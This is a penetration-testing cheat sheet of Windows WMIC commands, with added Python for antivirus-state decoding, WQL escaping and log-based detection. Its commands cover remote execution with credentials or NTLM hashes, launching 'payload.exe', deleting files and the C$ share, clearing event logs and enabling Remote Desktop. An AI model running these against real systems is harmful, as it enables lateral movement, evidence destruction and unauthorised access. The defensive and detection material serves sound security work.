WMI
wmic is a command built into Windows. It is very powerful and can be a useful aid during penetration testing.
wmic remote command execution
From the command line (no output is returned to the caller; it is written to a file on the target)
wmic /node:ip /user:username /password:password process call create "cmd.exe /c ipconfig >> ipconfig.txt"
Remote command execution with wmiexec.vbs
cscript //nologo wmiexec.vbs /cmd ip username password "ipconfig"
cscript //nologo wmiexec.vbs /shell ip username password
Remote command execution with Invoke-WMIExec.ps1
Invoke-WMIExec -Target ip -Username username[@domain.com] -Hash ntlm_hash -Command "ipconfig" -verbose
Using Invoke-TheHash
Invoke-TheHash -Type WMIExec -Targets 192.168.1.0/24 -TargetsExclude 192.168.1.50 -Username username -Hash ntlm_hash [-Command "ipconfig"]
Executing commands with WMIcmd.exe
WMIcmd.exe -h host -u username -p password -c "ipconfig"
wmic information gathering
Get the user name and domain
wmic computersystem get domain,username
Query user logon information
Query remote connections
Query the time zone
Query startup programs
Query domain information
Query installed patches
Query shared resources
wmic share list brief
wmic share where name="C$" call delete
Query network adapter information
Query driver information
wmic sysdriver list brief
Query CPU information
Query operating system information
wmic os list brief
wmic os get Caption,Version,BuildNumber,OSArchitecture,CSName,RegisteredUser
Query antivirus software information
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
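The antivirus query above returns productState as a plain integer that is meaningless until decoded. The following is an added example (my own Python, not code from the page): it parses the key=value records that wmic prints with /format:list and decodes productState with the widely used bitfield heuristic (an assumption, not a documented format). The output text is constructed; "ExampleAV" and its path are placeholders.

```python
# Constructed sample of what the query prints when run with /format:list:
# one Key=Value line per property, blank lines between records.
SAMPLE_OUTPUT = """\
displayName=Windows Defender
pathToSignedProductExe=windowsdefender://
productState=397568


displayName=ExampleAV (constructed placeholder)
pathToSignedProductExe=C:\\Program Files\\ExampleAV\\eav.exe
productState=266256
"""


def parse_wmic_list(text):
    """Parse wmic /format:list output into a list of dicts, one per record.
    Records are blocks of Key=Value lines separated by blank lines."""
    records, current = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, sep, value = line.partition("=")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def decode_product_state(state):
    """Decode SecurityCenter2 productState with the common heuristic (assumption):
    written as 6 hex digits, digits 3-4 equal to 10 or 11 mean real-time
    protection is enabled, and digits 5-6 equal to 00 mean signatures are
    up to date (10 means out of date)."""
    hexstate = format(int(state), "06x")
    return {
        "enabled": hexstate[2:4] in ("10", "11"),
        "up_to_date": hexstate[4:6] == "00",
    }


def summarize_av(text):
    """One summary dict per antivirus product found in the wmic output."""
    summary = []
    for rec in parse_wmic_list(text):
        flags = decode_product_state(rec.get("productState", "0"))
        summary.append({"name": rec.get("displayName", "?"), **flags})
    return summary


if __name__ == "__main__":
    for product in summarize_av(SAMPLE_OUTPUT):
        print(product)
```

A defender auditing a fleet can feed the real wmic output into summarize_av to spot hosts whose product is registered but disabled or out of date; 397568 (0x61100) decodes as enabled and current, 266256 (0x41010) as enabled but out of date.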
Determine whether the host is a virtual machine
wmic onboarddevice get Description, DeviceType, Enabled, Status /format:list
User account management
Query user account information
wmic useraccount list brief
wmic useraccount where name="Administrator"
Rename a user name
wmic useraccount where name="%UserName%" rename newUserName
Change an account's full name
wmic useraccount where name="Administrator" set fullname newFullName
Lock (disable) the specified account
wmic useraccount where name="user_name" set disabled=true
Prevent a user from changing their password
wmic useraccount where name="user_name" set passwordchangeable=false
Process management
View process information
Create a process
wmic process call create "shutdown.exe"
wmic process call create "payload.exe"
Stop the specified process (the Win32_Process property is processid, not pid)
wmic process where name="xxx.exe" call terminate
wmic process where processid="123" call terminate
wmic process where name="xxx.exe" delete
wmic process where processid="123" delete
Service management
View service information
wmic service list brief
wmic service where name="service_name"
wmic service where (status="running") get caption,name,startmode
Start the specified service
wmic service where name="service_name" call startservice
Pause the specified service
wmic service where name="service_name" call pauseservice
Stop the specified service (the Win32_Service method is StopService; there is no Terminate method on services)
wmic service where name="service_name" call stopservice
Delete the specified service
wmic service where name="service_name" delete
Change a service's start mode
wmic service where name="service_name" set startmode="auto"
File management
Query information about a specific file
wmic datafile where name="C:\\Users\\%USERNAME%\\Desktop\\1.txt" get /format:list
Find files
Specific drive + specific file name + specific extension
wmic datafile where "drive='c:' and filename='123' and extension='txt'" get name
Specific drive + fuzzy file name + fuzzy path + specific extension
wmic datafile where "drive='c:' and filename like '%file_name%' and path like '%test%' and extension='txt'" get name
Delete files
wmic datafile where "drive='c:' and filename='test' and extension='txt'" call delete
wmic datafile where "drive='c:' and extension<>'txt'" call delete
wmic datafile where "drive='c:' and extension<>'txt' and path='test'" call delete
Copy a file
wmic datafile where "drive='c:' and path='test' and FileName='cc' and Extension='txt'" call copy "E:\cc.txt"
Rename a file (move a file)
wmic datafile "C:\\123.txt" call rename "C:\\test\\test.txt"
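The datafile commands above all depend on one detail that is easy to get wrong: WQL uses the backslash as its escape character, so paths inside the where clause must have every backslash doubled (the reason the page writes C:\\Users\\...), and a file name containing a quote must be escaped too or it terminates the literal early. The following is an added example (my own Python, not code from the page) that builds those filters with the escaping applied, generalising the page's individual commands; function names are my own, and the treatment of embedded quotes as backslash-escaped is an assumption about WQL. Win32_DataFile stores Drive as "c:", Path as "\dir\sub\" with leading and trailing backslash, FileName without its extension, and Extension without the dot.

```python
def wql_literal(value):
    """Quote a string for a WQL comparison. Backslashes are doubled and embedded
    single quotes are backslash-escaped (assumption: C-style escaping as WQL
    uses it), so a crafted file name cannot break out of the filter."""
    escaped = value.replace("\\", "\\\\").replace("'", "\\'")
    return "'" + escaped + "'"


def build_datafile_filter(drive, path=None, filename=None, extension=None,
                          path_like=False, filename_like=False):
    """Return the WQL condition that goes after `wmic datafile where`.
    path/filename use = by default, or LIKE with % wildcards when *_like is set."""
    conds = ["drive=" + wql_literal(drive)]
    if path is not None:
        conds.append("path" + (" like " if path_like else "=") + wql_literal(path))
    if filename is not None:
        conds.append("filename" + (" like " if filename_like else "=")
                     + wql_literal(filename))
    if extension is not None:
        conds.append("extension=" + wql_literal(extension))
    return " and ".join(conds)


def build_datafile_command(verb="get name", **kwargs):
    """Wrap the filter in the double quotes cmd.exe needs to pass it to wmic as a
    single argument. Note: inside a .bat/.cmd file every % of a LIKE pattern
    must be written as %% because cmd.exe expands %name% in batch files."""
    return 'wmic datafile where "' + build_datafile_filter(**kwargs) + '" ' + verb


if __name__ == "__main__":
    # Exact match on C:\test\cc.txt (Path stored as \test\).
    print(build_datafile_command(drive="c:", path="\\test\\",
                                 filename="cc", extension="txt"))
    # Fuzzy search, as in the page's second find example.
    print(build_datafile_command(drive="c:", filename="%file_name%",
                                 filename_like=True, path="%test%",
                                 path_like=True, extension="txt"))
```

This escapes for WQL only; cmd.exe quoting is a separate layer, so a value containing a double quote still needs handling before it is placed on a command line.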
Folder management
Find folders
wmic fsdir where "drive='c:' and filename='test'"
Delete folders
wmic fsdir where "drive='c:' and filename like 'test'" call delete
wmic fsdir "C:\\test" call delete
Rename a folder
wmic fsdir "C:\\test" rename "C:\\test2"
Log clearing
wmic nteventlog where filename="log_name" cleareventlog
wmic nteventlog where filename="system" cleareventlog
Remote Desktop
Enable Remote Desktop
wmic rdtoggle where servername="%computername%" call SetAllowTSConnections 1
Disable Remote Desktop
wmic rdtoggle where servername="%computername%" call SetAllowTSConnections 0
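Every command on this page, from the remote execution forms at the top to the log clearing and Remote Desktop toggles above, leaves a process-creation record on the host that ran it (Windows Security event 4688 or Sysmon event 1 with command-line logging), which is what a defender can hunt on. The following is an added example (my own Python, not code from the page) that classifies such command lines with a small rule set keyed to the page's own wmic verbs; the event records are constructed, with hypothetical host and user names, and the tag names are my own.

```python
import re

# Constructed sample process-creation records (hypothetical hosts and users),
# shaped like the fields of a Sysmon event 1 or Security event 4688. The
# command lines are the page's own wmic commands with placeholder targets.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice",
     "cmdline": 'wmic computersystem get domain,username'},
    {"host": "WS01", "user": "CORP\\alice",
     "cmdline": 'wmic /node:10.0.0.5 /user:CORP\\svc /password:P@ss '
                'process call create "cmd.exe /c ipconfig >> ipconfig.txt"'},
    {"host": "SRV02", "user": "CORP\\bob",
     "cmdline": 'C:\\Windows\\System32\\wbem\\WMIC.exe nteventlog '
                'where filename="system" cleareventlog'},
    {"host": "SRV02", "user": "CORP\\bob",
     "cmdline": 'wmic rdtoggle where servername="%computername%" '
                'call SetAllowTSConnections 1'},
    {"host": "WS03", "user": "CORP\\carol",
     "cmdline": 'wmic useraccount where name="user_name" set passwordchangeable=false'},
    {"host": "WS03", "user": "CORP\\carol",
     "cmdline": 'wmic share where name="C$" call delete'},
    {"host": "WS03", "user": "CORP\\carol",
     "cmdline": 'wmic service list brief'},
]

# Each rule is a tag plus a case-insensitive pattern over the command line.
RULES = [
    ("remote_exec",          re.compile(r"/node:\S+.*\bprocess\b.*\bcall\b.*\bcreate\b", re.I)),
    ("cleartext_credential", re.compile(r"/password:\S+", re.I)),
    ("local_process_create", re.compile(r"^(?!.*/node:).*\bprocess\b.*\bcall\b.*\bcreate\b", re.I)),
    ("log_clear",            re.compile(r"\bnteventlog\b.*\bcleareventlog\b", re.I)),
    ("rdp_enable",           re.compile(r"\brdtoggle\b.*SetAllowTSConnections\s+1\b", re.I)),
    ("account_modify",       re.compile(r"\buseraccount\b.*\bset\b", re.I)),
    ("share_delete",         re.compile(r"\bshare\b.*\bcall\s+delete\b", re.I)),
]


def is_wmic(cmdline):
    """True if the image invoked is wmic, whether bare or by full path."""
    parts = cmdline.strip().split()
    if not parts:
        return False
    image = parts[0].strip('"').lower()
    return image.endswith("wmic") or image.endswith("wmic.exe")


def classify(cmdline):
    """Return the rule tags matching one command line (empty for benign use)."""
    if not is_wmic(cmdline):
        return []
    return [tag for tag, rx in RULES if rx.search(cmdline)]


def triage(events):
    """Keep only the events that hit at least one rule, with their tags attached."""
    findings = []
    for ev in events:
        tags = classify(ev["cmdline"])
        if tags:
            findings.append({**ev, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["host"], f["user"], f["tags"], "<-", f["cmdline"])
```

The plain inventory queries (computersystem get, service list brief) produce no tags, so the rules separate routine administration from the actions that change a host's state or destroy evidence; a remote /node: invocation with /password: on the command line is additionally flagged because the credential is now recorded in the event log of the machine it was typed on.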
Software management
Get the list of installed software
Uninstall software
wmic product where name="xxx" call uninstall
Reinstall software
wmic product where name="xxx" call reinstall